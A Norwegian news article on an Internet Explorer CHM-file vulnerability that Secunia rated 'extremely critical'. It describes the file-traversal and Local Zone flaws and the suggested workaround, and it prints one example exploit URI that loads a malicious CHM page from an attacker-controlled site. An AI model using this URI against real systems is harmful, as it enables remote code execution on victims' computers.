Sikkerhetsselskapet Secunia har gitt et kjent sikkerhetshull i Internet Explorer alvorlighetsgraden "Meget Kritisk" etter at nye detaljer er blitt kjent.
Sikkerhetshullet, som Secunia først omtalte i begynnelsen av januar i år, gjør det mulig for ondsinnede å få økt tilgang til et sårbart system via Internett.
Eksterne og lokalt installerte "CHM"-filer, den filtypen som den innebygde hjelpen i mye programvare er lagret som, kan åpnes av nettsteder enten ved hjelp av "showHelp"-funksjonen eller URI-handlere som "ms-its:" og "mk:@MSITStore:". Normalt er det ifølge Secunia ikke noe problem at Internet Explorer tillater nettsteder å åpne lokalt installerte CHM-filer, siden de betraktes som filer man har tillitt til.
Det finnes dog to problemer med håndteringen av CHM-filer.
- Det er mulig å behandle andre lokale filer som CHM-filer ved å benytte en spesiell syntaks som inkluderer et dobbelt semikolon i slutten av filnavnet, kombinert med katalog-traversering ved hjelp av tegnene "..//".
Dette kan utnyttes via programvare som WinAmp, Flash Player, XMLHTTP og ADODB stream, som gjør det mulig å plassere filer med vilkårlig innhold på en kjent plassering på brukerens system.
- Filer som ikke er lokalt installert, kan fortsatt eksekvere vilkårlig kode assosiert med sikkerhetssonen "Local Zone" ved å referere til en ikke-eksisterende fil
Et eksempel på det hvordan dette kan utnyttes:
ms-its:mhtml:file://C:\eksisterer_ikke.mhtml!http://[ondsindet_site] //ondsindet.chm::/ond.html
Sårbarheten kan utnyttes i alle utgaver av Internet Explorer. Det er ikke kjent hva Microsofts planer er for å løse problemet.
Som en midlertidig løsning foreslår Secunia at filassosieringen for CHM-filer fjernes. Men dette vil også føre til at Windows Hjelp deaktiveres.